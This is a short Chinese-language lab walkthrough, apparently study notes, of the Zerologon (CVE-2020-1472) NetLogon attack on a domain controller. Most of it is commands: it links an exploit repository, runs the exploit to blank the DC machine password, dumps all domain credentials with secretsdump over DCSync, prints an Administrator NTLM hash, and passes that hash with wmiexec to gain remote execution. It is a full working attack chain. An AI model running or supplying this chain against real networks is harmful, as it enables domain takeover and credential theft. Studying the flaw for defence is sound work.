CVE-2020-1472 NetLogon 漏洞学习

相关项目、EXP

• https://github.com/mstxq17/cve-2020-1472

安装依赖

python -m pip install -r requirement.txt

检测漏洞

python zerologon_tester.py DCNAME DCIP

利用过程

检测漏洞

python zerologon_tester.py dc01 192.168.214.200

It may take a while due to the network stability

EXP 指控机器账户

先 dump 出结果做对比

python cve-2020-1472-exploit.py dc01 192.168.214.200

看到 DC01 用户密码已被置空

查询验证

导出用户凭据

域控的机器账户可以使用 DCSync 导出域内所有用户凭据

python secretsdump.py ust4.fun/'DC01$'@192.168.214.200 -no-pass

获得域管 Administrator 的 hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:214114172ade9bb8d8feca6d765e0cf9:::

HASH 传递

使用 wmiexec 进行 hash 传递，为了解决乱码使用 GBK 编码(-codec gbk)

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:214114172ade9bb8d8feca6d765e0cf9 ust4.fun/Administrator@192.168.214.200 -codec gbk